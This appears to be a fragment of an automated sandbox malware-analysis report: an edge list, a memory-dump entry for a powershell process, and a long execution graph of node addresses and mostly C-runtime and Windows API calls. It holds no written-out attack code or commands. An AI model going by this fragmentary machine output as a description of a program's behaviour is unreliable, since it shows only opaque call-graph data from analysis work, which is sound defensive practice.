821->824 826 7ff848e20c09-7ff848e20cb9 822->826 827 7ff848e20aea-7ff848e20af4 822->827 823->824 824->822 864 7ff848e20cbb 826->864 865 7ff848e20cbc-7ff848e20ccd 826->865 828 7ff848e20b0d-7ff848e20b12 827->828 829 7ff848e20af6-7ff848e20b03 827->829 830 7ff848e20b18-7ff848e20b1b 828->830 831 7ff848e20baa-7ff848e20bb4 828->831 829->828 838 7ff848e20b05-7ff848e20b0b 829->838 830->831 834 7ff848e20b21-7ff848e20b24 830->834 836 7ff848e20bc3-7ff848e20c06 831->836 837 7ff848e20bb6-7ff848e20bc2 831->837 839 7ff848e20b4b 834->839 840 7ff848e20b26-7ff848e20b49 834->840 836->826 838->828 844 7ff848e20b4d-7ff848e20b4f 839->844 840->844 844->831 848 7ff848e20b51-7ff848e20b5b 844->848 848->831 854 7ff848e20b5d-7ff848e20b73 848->854 858 7ff848e20b7a-7ff848e20b83 854->858 859 7ff848e20b9c-7ff848e20ba9 858->859 860 7ff848e20b85-7ff848e20b92 858->860 860->859 863 7ff848e20b94-7ff848e20b9a 860->863 863->859 864->865 866 7ff848e20ccf 865->866 867 7ff848e20cd0-7ff848e20d19 865->867 866->867 868 7ff848e20d1b-7ff848e20d25 867->868 869 7ff848e20d2f-7ff848e20d53 867->869 868->869 872 7ff848e20d59-7ff848e20d62 869->872 873 7ff848e20e32-7ff848e20e3c 869->873 872->873 875 7ff848e20e48-7ff848e20e88 873->875 876 7ff848e20e3e-7ff848e20e47 873->876
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2639604185.00007FF848E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_7ff848e20000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 39148577ec5d28fe9f0fc2b56f9e3fd3b1ec40157e07c52157465fa1aea85d55
                                            • Instruction ID: aa85f18a653561b8b6eaac5139399251c408db5a8c2ce38ecded27b1f0fa7cda
                                            • Opcode Fuzzy Hash: 39148577ec5d28fe9f0fc2b56f9e3fd3b1ec40157e07c52157465fa1aea85d55
                                            • Instruction Fuzzy Hash: 05112C52F2EE5E5FF2B5B62C2819178A5C1FF84BA0F4801BAC41DC35C6DE19AC15019D

                                            Execution Graph

                                            Execution Coverage:2.6%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:2.6%
                                            Total number of Nodes:1668
                                            Total number of Limit Nodes:5
                                            execution_graph 6511 10008640 6514 10008657 6511->6514 6515 10008665 6514->6515 6516 10008679 6514->6516 6519 10006368 _free 20 API calls 6515->6519 6517 10008681 6516->6517 6518 10008693 6516->6518 6521 10006368 _free 20 API calls 6517->6521 6525 10008652 6518->6525 6527 100054a7 6518->6527 6520 1000866a 6519->6520 6522 100062ac _abort 26 API calls 6520->6522 6523 10008686 6521->6523 6522->6525 6526 100062ac _abort 26 API calls 6523->6526 6526->6525 6528 100054ba 6527->6528 6529 100054c4 6527->6529 6528->6525 6529->6528 6530 10005af6 _abort 38 API calls 6529->6530 6531 100054e5 6530->6531 6535 10007a00 6531->6535 6536 10007a13 6535->6536 6537 100054fe 6535->6537 6536->6537 6543 10007f0f 6536->6543 6539 10007a2d 6537->6539 6540 10007a40 6539->6540 6541 10007a55 6539->6541 6540->6541 6678 10006d7e 6540->6678 6541->6528 6544 10007f1b ___scrt_is_nonwritable_in_current_image 6543->6544 6545 10005af6 _abort 38 API calls 6544->6545 6546 10007f24 6545->6546 6547 10007f72 _abort 6546->6547 6555 10005671 RtlEnterCriticalSection 6546->6555 6547->6537 6549 10007f42 6556 10007f86 6549->6556 6554 100055a8 _abort 38 API calls 6554->6547 6555->6549 6557 10007f56 6556->6557 6558 10007f94 __fassign 6556->6558 6560 10007f75 6557->6560 6558->6557 6563 10007cc2 6558->6563 6677 100056b9 RtlLeaveCriticalSection 6560->6677 6562 10007f69 6562->6547 6562->6554 6564 10007d42 6563->6564 6567 10007cd8 6563->6567 6565 10007d90 6564->6565 6568 1000571e _free 20 API calls 6564->6568 6631 10007e35 6565->6631 6567->6564 6569 10007d0b 6567->6569 6574 1000571e _free 20 API calls 6567->6574 6570 10007d64 6568->6570 6571 10007d2d 6569->6571 6576 1000571e _free 20 API calls 6569->6576 6572 1000571e _free 20 API calls 6570->6572 6573 1000571e _free 20 API calls 6571->6573 6575 10007d77 6572->6575 6578 10007d37 6573->6578 6580 10007d00 6574->6580 6577 1000571e _free 20 API calls 6575->6577 6582 10007d22 6576->6582 6583 10007d85 6577->6583 6584 1000571e _free 20 API calls 6578->6584 6579 10007dfe 6585 1000571e _free 20 API calls 6579->6585 6591 100090ba 6580->6591 6581 10007d9e 6581->6579 6589 1000571e 20 API calls _free 6581->6589 6619 100091b8 6582->6619 6588 1000571e _free 20 API calls 6583->6588 6584->6564 6590 10007e04 6585->6590 6588->6565 6589->6581 6590->6557 6592 100090cb 6591->6592 6618 100091b4 6591->6618 6593 100090dc 6592->6593 6594 1000571e _free 20 API calls 6592->6594 6595 100090ee 6593->6595 6597 1000571e _free 20 API calls 6593->6597 6594->6593 6596 10009100 6595->6596 6598 1000571e _free 20 API calls 6595->6598 6599 10009112 6596->6599 6600 1000571e _free 20 API calls 6596->6600 6597->6595 6598->6596 6601 10009124 6599->6601 6602 1000571e _free 20 API calls 6599->6602 6600->6599 6603 10009136 6601->6603 6605 1000571e _free 20 API calls 6601->6605 6602->6601 6604 10009148 6603->6604 6606 1000571e _free 20 API calls 6603->6606 6607 1000915a 6604->6607 6608 1000571e _free 20 API calls 6604->6608 6605->6603 6606->6604 6609 1000571e _free 20 API calls 6607->6609 6612 1000916c 6607->6612 6608->6607 6609->6612 6610 10009190 6615 100091a2 6610->6615 6616 1000571e _free 20 API calls 6610->6616 6611 1000917e 6611->6610 6614 1000571e _free 20 API calls 6611->6614 6612->6611 6613 1000571e _free 20 API calls 6612->6613 6613->6611 6614->6610 6617 1000571e _free 20 API calls 6615->6617 6615->6618 6616->6615 6617->6618 6618->6569 6620 100091c5 6619->6620 6630 1000921d 6619->6630 6621 1000571e _free 20 API calls 6620->6621 6622 100091d5 6620->6622 6621->6622 6623 100091e7 6622->6623 6624 1000571e _free 20 API calls 6622->6624 6625 100091f9 6623->6625 6627 1000571e _free 20 API calls 6623->6627 6624->6623 6626 1000920b 6625->6626 6628 1000571e _free 20 API calls 6625->6628 6629 1000571e _free 20 API calls 6626->6629 6626->6630 6627->6625 6628->6626 6629->6630 6630->6571 6632 10007e60 6631->6632 6633 10007e42 6631->6633 6632->6581 6633->6632 6637 1000925d 6633->6637 6636 1000571e _free 20 API calls 6636->6632 6638 10007e5a 6637->6638 6639 1000926e 6637->6639 6638->6636 6673 10009221 6639->6673 6642 10009221 __fassign 20 API calls 6643 10009281 6642->6643 6644 10009221 __fassign 20 API calls 6643->6644 6645 1000928c 6644->6645 6646 10009221 __fassign 20 API calls 6645->6646 6647 10009297 6646->6647 6648 10009221 __fassign 20 API calls 6647->6648 6649 100092a5 6648->6649 6650 1000571e _free 20 API calls 6649->6650 6651 100092b0 6650->6651 6652 1000571e _free 20 API calls 6651->6652 6653 100092bb 6652->6653 6654 1000571e _free 20 API calls 6653->6654 6655 100092c6 6654->6655 6656 10009221 __fassign 20 API calls 6655->6656 6657 100092d4 6656->6657 6658 10009221 __fassign 20 API calls 6657->6658 6659 100092e2 6658->6659 6660 10009221 __fassign 20 API calls 6659->6660 6661 100092f3 6660->6661 6662 10009221 __fassign 20 API calls 6661->6662 6663 10009301 6662->6663 6664 10009221 __fassign 20 API calls 6663->6664 6665 1000930f 6664->6665 6666 1000571e _free 20 API calls 6665->6666 6667 1000931a 6666->6667 6668 1000571e _free 20 API calls 6667->6668 6669 10009325 6668->6669 6670 1000571e _free 20 API calls 6669->6670 6671 10009330 6670->6671 6672 1000571e _free 20 API calls 6671->6672 6672->6638 6674 10009258 6673->6674 6675 10009248 6673->6675 6674->6642 6675->6674 6676 1000571e _free 20 API calls 6675->6676 6676->6675 6677->6562 6679 10006d8a ___scrt_is_nonwritable_in_current_image 6678->6679 6680 10005af6 _abort 38 API calls 6679->6680 6682 10006d94 6680->6682 6683 10006e18 _abort 6682->6683 6684 100055a8 _abort 38 API calls 6682->6684 6686 1000571e _free 20 API calls 6682->6686 6687 10005671 RtlEnterCriticalSection 6682->6687 6688 10006e0f 6682->6688 6683->6541 6684->6682 6686->6682 6687->6682 6691 100056b9 RtlLeaveCriticalSection 6688->6691 6690 10006e16 6690->6682 6691->6690 7258 10007a80 7259 10007a8d 7258->7259 7260 1000637b _abort 20 API calls 7259->7260 7261 10007aa7 7260->7261 7262 1000571e _free 20 API calls 7261->7262 7263 10007ab3 7262->7263 7264 1000637b _abort 20 API calls 7263->7264 7267 10007ad9 7263->7267 7266 10007acd 7264->7266 7265 10005eb7 11 API calls 7265->7267 7268 1000571e _free 20 API calls 7266->7268 7267->7265 7269 10007ae5 7267->7269 7268->7267 6083 10007103 GetCommandLineA GetCommandLineW 6084 10005303 6087 100050a5 6084->6087 6096 1000502f 6087->6096 6090 1000502f 5 API calls 6091 100050c3 6090->6091 6100 10005000 6091->6100 6094 10005000 20 API calls 6095 100050d9 6094->6095 6097 10005048 6096->6097 6098 10002ada _ValidateLocalCookies 5 API calls 6097->6098 6099 10005069 6098->6099 6099->6090 6101 1000502a 6100->6101 6102 1000500d 6100->6102 6101->6094 6103 10005024 6102->6103 6104 1000571e _free 20 API calls 6102->6104 6105 1000571e _free 20 API calls 6103->6105 6104->6102 6105->6101 6692 1000af43 6693 1000af59 6692->6693 6694 1000af4d 6692->6694 6694->6693 6695 1000af52 CloseHandle 6694->6695 6695->6693 6696 1000a945 6697 1000a96d 6696->6697 6698 1000a9a5 6697->6698 6699 1000a997 6697->6699 6700 1000a99e 6697->6700 6705 1000aa17 6699->6705 6709 1000aa00 6700->6709 6706 1000aa20 6705->6706 6713 1000b19b 6706->6713 6710 1000aa20 6709->6710 6711 1000b19b __startOneArgErrorHandling 21 API calls 6710->6711 6712 1000a9a3 6711->6712 6714 1000b1da __startOneArgErrorHandling 6713->6714 6716 1000b25c __startOneArgErrorHandling 6714->6716 6723 1000b59e 6714->6723 6721 1000b286 6716->6721 6726 100078a3 6716->6726 6718 1000b292 6720 10002ada _ValidateLocalCookies 5 API calls 6718->6720 6722 1000a99c 6720->6722 6721->6718 6730 1000b8b2 6721->6730 6737 1000b5c1 6723->6737 6727 100078cb 6726->6727 6728 10002ada _ValidateLocalCookies 5 API calls 6727->6728 6729 100078e8 6728->6729 6729->6721 6731 1000b8d4 6730->6731 6732 1000b8bf 6730->6732 6734 10006368 _free 20 API calls 6731->6734 6733 1000b8d9 6732->6733 6735 10006368 _free 20 API calls 6732->6735 6733->6718 6734->6733 6736 1000b8cc 6735->6736 6736->6718 6738 1000b5ec __raise_exc 6737->6738 6739 1000b7e5 RaiseException 6738->6739 6740 1000b5bc 6739->6740 6740->6716 7521 1000a1c6 IsProcessorFeaturePresent 7522 10007bc7 7523 10007bd3 ___scrt_is_nonwritable_in_current_image 7522->7523 7524 10007c0a _abort 7523->7524 7530 10005671 RtlEnterCriticalSection 7523->7530 7526 10007be7 7527 10007f86 __fassign 20 API calls 7526->7527 7528 10007bf7 7527->7528 7531 10007c10 7528->7531 7530->7526 7534 100056b9 RtlLeaveCriticalSection 7531->7534 7533 10007c17 7533->7524 7534->7533 6741 10005348 6742 10003529 ___vcrt_uninitialize 8 API calls 6741->6742 6743 1000534f 6742->6743 6744 10007b48 6754 10008ebf 6744->6754 6748 10007b55 6767 1000907c 6748->6767 6751 10007b7f 6752 1000571e _free 20 API calls 6751->6752 6753 10007b8a 6752->6753 6771 10008ec8 6754->6771 6756 10007b50 6757 10008fdc 6756->6757 6758 10008fe8 ___scrt_is_nonwritable_in_current_image 6757->6758 6791 10005671 RtlEnterCriticalSection 6758->6791 6760 1000905e 6805 10009073 6760->6805 6762 10009032 RtlDeleteCriticalSection 6765 1000571e _free 20 API calls 6762->6765 6763 1000906a _abort 6763->6748 6766 10008ff3 6765->6766 6766->6760 6766->6762 6792 1000a09c 6766->6792 6768 10009092 6767->6768 6769 10007b64 RtlDeleteCriticalSection 6767->6769 6768->6769 6770 1000571e _free 20 API calls 6768->6770 6769->6748 6769->6751 6770->6769 6772 10008ed4 ___scrt_is_nonwritable_in_current_image 6771->6772 6781 10005671 RtlEnterCriticalSection 6772->6781 6774 10008f77 6786 10008f97 6774->6786 6777 10008f83 _abort 6777->6756 6779 10008e78 66 API calls 6780 10008ee3 6779->6780 6780->6774 6780->6779 6782 10007b94 RtlEnterCriticalSection 6780->6782 6783 10008f6d 6780->6783 6781->6780 6782->6780 6789 10007ba8 RtlLeaveCriticalSection 6783->6789 6785 10008f75 6785->6780 6790 100056b9 RtlLeaveCriticalSection 6786->6790 6788 10008f9e 6788->6777 6789->6785 6790->6788 6791->6766 6793 1000a0a8 ___scrt_is_nonwritable_in_current_image 6792->6793 6794 1000a0b9 6793->6794 6795 1000a0ce 6793->6795 6796 10006368 _free 20 API calls 6794->6796 6804 1000a0c9 _abort 6795->6804 6808 10007b94 RtlEnterCriticalSection 6795->6808 6798 1000a0be 6796->6798 6800 100062ac _abort 26 API calls 6798->6800 6799 1000a0ea 6809 1000a026 6799->6809 6800->6804 6802 1000a0f5 6825 1000a112 6802->6825 6804->6766 7073 100056b9 RtlLeaveCriticalSection 6805->7073 6807 1000907a 6807->6763 6808->6799 6810 1000a033 6809->6810 6811 1000a048 6809->6811 6812 10006368 _free 20 API calls 6810->6812 6817 1000a043 6811->6817 6828 10008e12 6811->6828 6813 1000a038 6812->6813 6815 100062ac _abort 26 API calls 6813->6815 6815->6817 6817->6802 6818 1000907c 20 API calls 6819 1000a064 6818->6819 6834 10007a5a 6819->6834 6821 1000a06a 6841 1000adce 6821->6841 6824 1000571e _free 20 API calls 6824->6817 7072 10007ba8 RtlLeaveCriticalSection 6825->7072 6827 1000a11a 6827->6804 6829 10008e2a 6828->6829 6830 10008e26 6828->6830 6829->6830 6831 10007a5a 26 API calls 6829->6831 6830->6818 6832 10008e4a 6831->6832 6856 10009a22 6832->6856 6835 10007a66 6834->6835 6836 10007a7b 6834->6836 6837 10006368 _free 20 API calls 6835->6837 6836->6821 6838 10007a6b 6837->6838 6839 100062ac _abort 26 API calls 6838->6839 6840 10007a76 6839->6840 6840->6821 6842 1000adf2 6841->6842 6843 1000addd 6841->6843 6844 1000ae2d 6842->6844 6849 1000ae19 6842->6849 6845 10006355 __dosmaperr 20 API calls 6843->6845 6846 10006355 __dosmaperr 20 API calls 6844->6846 6847 1000ade2 6845->6847 6850 1000ae32 6846->6850 6848 10006368 _free 20 API calls 6847->6848 6853 1000a070 6848->6853 7029 1000ada6 6849->7029 6852 10006368 _free 20 API calls 6850->6852 6854 1000ae3a 6852->6854 6853->6817 6853->6824 6855 100062ac _abort 26 API calls 6854->6855 6855->6853 6857 10009a2e ___scrt_is_nonwritable_in_current_image 6856->6857 6858 10009a36 6857->6858 6859 10009a4e 6857->6859 6881 10006355 6858->6881 6861 10009aec 6859->6861 6865 10009a83 6859->6865 6863 10006355 __dosmaperr 20 API calls 6861->6863 6866 10009af1 6863->6866 6864 10006368 _free 20 API calls 6867 10009a43 _abort 6864->6867 6884 10008c7b RtlEnterCriticalSection 6865->6884 6869 10006368 _free 20 API calls 6866->6869 6867->6830 6871 10009af9 6869->6871 6870 10009a89 6872 10009aa5 6870->6872 6873 10009aba 6870->6873 6874 100062ac _abort 26 API calls 6871->6874 6875 10006368 _free 20 API calls 6872->6875 6885 10009b0d 6873->6885 6874->6867 6877 10009aaa 6875->6877 6879 10006355 __dosmaperr 20 API calls 6877->6879 6878 10009ab5 6936 10009ae4 6878->6936 6879->6878 6882 10005b7a _abort 20 API calls 6881->6882 6883 1000635a 6882->6883 6883->6864 6884->6870 6886 10009b34 6885->6886 6887 10009b3b 6885->6887 6890 10002ada _ValidateLocalCookies 5 API calls 6886->6890 6888 10009b5e 6887->6888 6889 10009b3f 6887->6889 6892 10009baf 6888->6892 6893 10009b92 6888->6893 6891 10006355 __dosmaperr 20 API calls 6889->6891 6894 10009d15 6890->6894 6895 10009b44 6891->6895 6897 10009bc5 6892->6897 6939 1000a00b 6892->6939 6896 10006355 __dosmaperr 20 API calls 6893->6896 6894->6878 6898 10006368 _free 20 API calls 6895->6898 6900 10009b97 6896->6900 6942 100096b2 6897->6942 6902 10009b4b 6898->6902 6905 10006368 _free 20 API calls 6900->6905 6903 100062ac _abort 26 API calls 6902->6903 6903->6886 6908 10009b9f 6905->6908 6906 10009bd3 6909 10009bf9 6906->6909 6914 10009bd7 6906->6914 6907 10009c0c 6911 10009c20 6907->6911 6912 10009c66 WriteFile 6907->6912 6910 100062ac _abort 26 API calls 6908->6910 6954 10009492 GetConsoleCP 6909->6954 6910->6886 6917 10009c56 6911->6917 6918 10009c28 6911->6918 6916 10009c89 GetLastError 6912->6916 6923 10009bef 6912->6923 6913 10009ccd 6913->6886 6925 10006368 _free 20 API calls 6913->6925 6914->6913 6949 10009645 6914->6949 6916->6923 6980 10009728 6917->6980 6919 10009c46 6918->6919 6920 10009c2d 6918->6920 6972 100098f5 6919->6972 6920->6913 6965 10009807 6920->6965 6923->6886 6923->6913 6928 10009ca9 6923->6928 6927 10009cf2 6925->6927 6931 10006355 __dosmaperr 20 API calls 6927->6931 6929 10009cb0 6928->6929 6930 10009cc4 6928->6930 6932 10006368 _free 20 API calls 6929->6932 6987 10006332 6930->6987 6931->6886 6934 10009cb5 6932->6934 6935 10006355 __dosmaperr 20 API calls 6934->6935 6935->6886 7028 10008c9e RtlLeaveCriticalSection 6936->7028 6938 10009aea 6938->6867 6992 10009f8d 6939->6992 7014 10008dbc 6942->7014 6944 100096c2 6945 100096c7 6944->6945 6946 10005af6 _abort 38 API calls 6944->6946 6945->6906 6945->6907 6947 100096ea 6946->6947 6947->6945 6948 10009708 GetConsoleMode 6947->6948 6948->6945 6952 1000966a 6949->6952 6953 1000969f 6949->6953 6950 1000a181 WriteConsoleW CreateFileW 6950->6952 6951 100096a1 GetLastError 6951->6953 6952->6950 6952->6951 6952->6953 6953->6923 6958 100094f5 6954->6958 6964 10009607 6954->6964 6955 10002ada _ValidateLocalCookies 5 API calls 6956 10009641 6955->6956 6956->6923 6959 1000957b WideCharToMultiByte 6958->6959 6961 100079e6 40 API calls __fassign 6958->6961 6963 100095d2 WriteFile 6958->6963 6958->6964 7023 10007c19 6958->7023 6960 100095a1 WriteFile 6959->6960 6959->6964 6960->6958 6962 1000962a GetLastError 6960->6962 6961->6958 6962->6964 6963->6958 6963->6962 6964->6955 6967 10009816 6965->6967 6966 100098d8 6969 10002ada _ValidateLocalCookies 5 API calls 6966->6969 6967->6966 6968 10009894 WriteFile 6967->6968 6968->6967 6970 100098da GetLastError 6968->6970 6971 100098f1 6969->6971 6970->6966 6971->6923 6979 10009904 6972->6979 6973 10009a0f 6974 10002ada _ValidateLocalCookies 5 API calls 6973->6974 6976 10009a1e 6974->6976 6975 10009986 WideCharToMultiByte 6977 10009a07 GetLastError 6975->6977 6978 100099bb WriteFile 6975->6978 6976->6923 6977->6973 6978->6977 6978->6979 6979->6973 6979->6975 6979->6978 6985 10009737 6980->6985 6981 100097ea 6982 10002ada _ValidateLocalCookies 5 API calls 6981->6982 6984 10009803 6982->6984 6983 100097a9 WriteFile 6983->6985 6986 100097ec GetLastError 6983->6986 6984->6923 6985->6981 6985->6983 6986->6981 6988 10006355 __dosmaperr 20 API calls 6987->6988 6989 1000633d _free 6988->6989 6990 10006368 _free 20 API calls 6989->6990 6991 10006350 6990->6991 6991->6886 7001 10008d52 6992->7001 6994 10009f9f 6995 10009fa7 6994->6995 6996 10009fb8 SetFilePointerEx 6994->6996 6999 10006368 _free 20 API calls 6995->6999 6997 10009fd0 GetLastError 6996->6997 6998 10009fac 6996->6998 7000 10006332 __dosmaperr 20 API calls 6997->7000 6998->6897 6999->6998 7000->6998 7002 10008d74 7001->7002 7003 10008d5f 7001->7003 7006 10006355 __dosmaperr 20 API calls 7002->7006 7008 10008d99 7002->7008 7004 10006355 __dosmaperr 20 API calls 7003->7004 7005 10008d64 7004->7005 7007 10006368 _free 20 API calls 7005->7007 7009 10008da4 7006->7009 7010 10008d6c 7007->7010 7008->6994 7011 10006368 _free 20 API calls 7009->7011 7010->6994 7012 10008dac 7011->7012 7013 100062ac _abort 26 API calls 7012->7013 7013->7010 7015 10008dd6 7014->7015 7016 10008dc9 7014->7016 7018 10008de2 7015->7018 7019 10006368 _free 20 API calls 7015->7019 7017 10006368 _free 20 API calls 7016->7017 7020 10008dce 7017->7020 7018->6944 7021 10008e03 7019->7021 7020->6944 7022 100062ac _abort 26 API calls 7021->7022 7022->7020 7024 10005af6 _abort 38 API calls 7023->7024 7025 10007c24 7024->7025 7026 10007a00 __fassign 38 API calls 7025->7026 7027 10007c34 7026->7027 7027->6958 7028->6938 7032 1000ad24 7029->7032 7031 1000adca 7031->6853 7033 1000ad30 ___scrt_is_nonwritable_in_current_image 7032->7033 7043 10008c7b RtlEnterCriticalSection 7033->7043 7035 1000ad3e 7036 1000ad70 7035->7036 7037 1000ad65 7035->7037 7039 10006368 _free 20 API calls 7036->7039 7044 1000ae4d 7037->7044 7040 1000ad6b 7039->7040 7059 1000ad9a 7040->7059 7042 1000ad8d _abort 7042->7031 7043->7035 7045 10008d52 26 API calls 7044->7045 7047 1000ae5d 7045->7047 7046 1000ae63 7062 10008cc1 7046->7062 7047->7046 7049 1000ae95 7047->7049 7052 10008d52 26 API calls 7047->7052 7049->7046 7050 10008d52 26 API calls 7049->7050 7053 1000aea1 CloseHandle 7050->7053 7055 1000ae8c 7052->7055 7053->7046 7057 1000aead GetLastError 7053->7057 7054 1000aedd 7054->7040 7056 10008d52 26 API calls 7055->7056 7056->7049 7057->7046 7058 10006332 __dosmaperr 20 API calls 7058->7054 7071 10008c9e RtlLeaveCriticalSection 7059->7071 7061 1000ada4 7061->7042 7063 10008cd0 7062->7063 7064 10008d37 7062->7064 7063->7064 7069 10008cfa 7063->7069 7065 10006368 _free 20 API calls 7064->7065 7066 10008d3c 7065->7066 7067 10006355 __dosmaperr 20 API calls 7066->7067 7068 10008d27 7067->7068 7068->7054 7068->7058 7069->7068 7070 10008d21 SetStdHandle 7069->7070 7070->7068 7071->7061 7072->6827 7073->6807 7074 10002049 7075 10002055 ___scrt_is_nonwritable_in_current_image 7074->7075 7076 100020d3 7075->7076 7077 1000207d 7075->7077 7087 1000205e 7075->7087 7078 10002639 ___scrt_fastfail 4 API calls 7076->7078 7088 1000244c 7077->7088 7080 100020da 7078->7080 7081 10002082 7097 10002308 7081->7097 7083 10002087 __RTC_Initialize 7100 100020c4 7083->7100 7085 1000209f 7103 1000260b 7085->7103 7089 10002451 ___scrt_release_startup_lock 7088->7089 7090 10002461 7089->7090 7091 10002455 7089->7091 7094 1000246e 7090->7094 7095 1000499b _abort 28 API calls 7090->7095 7092 1000527a _abort 20 API calls 7091->7092 7093 1000245f 7092->7093 7093->7081 7094->7081 7096 10004bbd 7095->7096 7096->7081 7109 100034c7 RtlInterlockedFlushSList 7097->7109 7099 10002312 7099->7083 7111 1000246f 7100->7111 7102 100020c9 ___scrt_release_startup_lock 7102->7085 7104 10002617 7103->7104 7105 1000262d 7104->7105 7130 100053ed 7104->7130 7105->7087 7108 10003529 ___vcrt_uninitialize 8 API calls 7108->7105 7110 100034d7 7109->7110 7110->7099 7116 100053ff 7111->7116 7114 1000391b ___vcrt_uninitialize_ptd 6 API calls 7115 1000354d 7114->7115 7115->7102 7119 10005c2b 7116->7119 7120 10005c35 7119->7120 7122 10002476 7119->7122 7123 10005db2 7120->7123 7122->7114 7124 10005c45 _abort 5 API calls 7123->7124 7125 10005dd9 7124->7125 7126 10005df1 TlsFree 7125->7126 7127 10005de5 7125->7127 7126->7127 7128 10002ada _ValidateLocalCookies 5 API calls 7127->7128 7129 10005e02 7128->7129 7129->7122 7133 100074da 7130->7133 7136 100074f3 7133->7136 7134 10002ada _ValidateLocalCookies 5 API calls 7135 10002625 7134->7135 7135->7108 7136->7134 7270 10008a89 7273 10006d60 7270->7273 7274 10006d69 7273->7274 7275 10006d72 7273->7275 7277 10006c5f 7274->7277 7278 10005af6 _abort 38 API calls 7277->7278 7279 10006c6c 7278->7279 7280 10006d7e __fassign 38 API calls 7279->7280 7281 10006c74 7280->7281 7297 100069f3 7281->7297 7284 10006c8b 7284->7275 7287 10006cce 7290 1000571e _free 20 API calls 7287->7290 7290->7284 7291 10006cc9 7292 10006368 _free 20 API calls 7291->7292 7292->7287 7293 10006d12 7293->7287 7321 100068c9 7293->7321 7294 10006ce6 7294->7293 7295 1000571e _free 20 API calls 7294->7295 7295->7293 7298 100054a7 __fassign 38 API calls 7297->7298 7299 10006a05 7298->7299 7300 10006a14 GetOEMCP 7299->7300 7301 10006a26 7299->7301 7303 10006a3d 7300->7303 7302 10006a2b GetACP 7301->7302 7301->7303 7302->7303 7303->7284 7304 100056d0 7303->7304 7305 1000570e 7304->7305 7309 100056de _abort 7304->7309 7306 10006368 _free 20 API calls 7305->7306 7308 1000570c 7306->7308 7307 100056f9 RtlAllocateHeap 7307->7308 7307->7309 7308->7287 7311 10006e20 7308->7311 7309->7305 7309->7307 7310 1000474f _abort 7 API calls 7309->7310 7310->7309 7312 100069f3 40 API calls 7311->7312 7313 10006e3f 7312->7313 7316 10006e90 IsValidCodePage 7313->7316 7318 10006e46 7313->7318 7320 10006eb5 ___scrt_fastfail 7313->7320 7314 10002ada _ValidateLocalCookies 5 API calls 7315 10006cc1 7314->7315 7315->7291 7315->7294 7317 10006ea2 GetCPInfo 7316->7317 7316->7318 7317->7318 7317->7320 7318->7314 7324 10006acb GetCPInfo 7320->7324 7397 10006886 7321->7397 7323 100068ed 7323->7287 7325 10006baf 7324->7325 7331 10006b05 7324->7331 7328 10002ada _ValidateLocalCookies 5 API calls 7325->7328 7330 10006c5b 7328->7330 7330->7318 7334 100086e4 7331->7334 7333 10008a3e 43 API calls 7333->7325 7335 100054a7 __fassign 38 API calls 7334->7335 7337 10008704 MultiByteToWideChar 7335->7337 7338 10008742 7337->7338 7339 100087da 7337->7339 7341 100056d0 21 API calls 7338->7341 7344 10008763 ___scrt_fastfail 7338->7344 7340 10002ada _ValidateLocalCookies 5 API calls 7339->7340 7342 10006b66 7340->7342 7341->7344 7348 10008a3e 7342->7348 7343 100087d4 7353 10008801 7343->7353 7344->7343 7346 100087a8 MultiByteToWideChar 7344->7346 7346->7343 7347 100087c4 GetStringTypeW 7346->7347 7347->7343 7349 100054a7 __fassign 38 API calls 7348->7349 7350 10008a51 7349->7350 7357 10008821 7350->7357 7354 1000880d 7353->7354 7355 1000881e 7353->7355 7354->7355 7356 1000571e _free 20 API calls 7354->7356 7355->7339 7356->7355 7359 1000883c 7357->7359 7358 10008862 MultiByteToWideChar 7360 1000888c 7358->7360 7371 10008a16 7358->7371 7359->7358 7365 100056d0 21 API calls 7360->7365 7367 100088ad 7360->7367 7361 10002ada _ValidateLocalCookies 5 API calls 7362 10006b87 7361->7362 7362->7333 7363 100088f6 MultiByteToWideChar 7364 10008962 7363->7364 7366 1000890f 7363->7366 7369 10008801 __freea 20 API calls 7364->7369 7365->7367 7384 10005f19 7366->7384 7367->7363 7367->7364 7369->7371 7371->7361 7372 10008971 7374 100056d0 21 API calls 7372->7374 7377 10008992 7372->7377 7373 10008939 7373->7364 7375 10005f19 11 API calls 7373->7375 7374->7377 7375->7364 7376 10008a07 7379 10008801 __freea 20 API calls 7376->7379 7377->7376 7378 10005f19 11 API calls 7377->7378 7380 100089e6 7378->7380 7379->7364 7380->7376 7381 100089f5 WideCharToMultiByte 7380->7381 7381->7376 7382 10008a35 7381->7382 7383 10008801 __freea 20 API calls 7382->7383 7383->7364 7385 10005c45 _abort 5 API calls 7384->7385 7386 10005f40 7385->7386 7389 10005f49 7386->7389 7392 10005fa1 7386->7392 7390 10002ada _ValidateLocalCookies 5 API calls 7389->7390 7391 10005f9b 7390->7391 7391->7364 7391->7372 7391->7373 7393 10005c45 _abort 5 API calls 7392->7393 7394 10005fc8 7393->7394 7395 10002ada _ValidateLocalCookies 5 API calls 7394->7395 7396 10005f89 LCMapStringW 7395->7396 7396->7389 7398 10006892 ___scrt_is_nonwritable_in_current_image 7397->7398 7405 10005671 RtlEnterCriticalSection 7398->7405 7400 1000689c 7406 100068f1 7400->7406 7404 100068b5 _abort 7404->7323 7405->7400 7418 10007011 7406->7418 7408 1000693f 7409 10007011 26 API calls 7408->7409 7410 1000695b 7409->7410 7411 10007011 26 API calls 7410->7411 7412 10006979 7411->7412 7413 100068a9 7412->7413 7414 1000571e _free 20 API calls 7412->7414 7415 100068bd 7413->7415 7414->7413 7432 100056b9 RtlLeaveCriticalSection 7415->7432 7417 100068c7 7417->7404 7419 10007022 7418->7419 7428 1000701e 7418->7428 7420 10007029 7419->7420 7424 1000703c ___scrt_fastfail 7419->7424 7421 10006368 _free 20 API calls 7420->7421 7422 1000702e 7421->7422 7423 100062ac _abort 26 API calls 7422->7423 7423->7428 7425 10007073 7424->7425 7426 1000706a 7424->7426 7424->7428 7425->7428 7430 10006368 _free 20 API calls 7425->7430 7427 10006368 _free 20 API calls 7426->7427 7429 1000706f 7427->7429 7428->7408 7431 100062ac _abort 26 API calls 7429->7431 7430->7429 7431->7428 7432->7417 6106 1000220c 6107 10002215 6106->6107 6108 1000221a dllmain_dispatch 6106->6108 6110 100022b1 6107->6110 6111 100022c7 6110->6111 6113 100022d0 6111->6113 6114 10002264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId 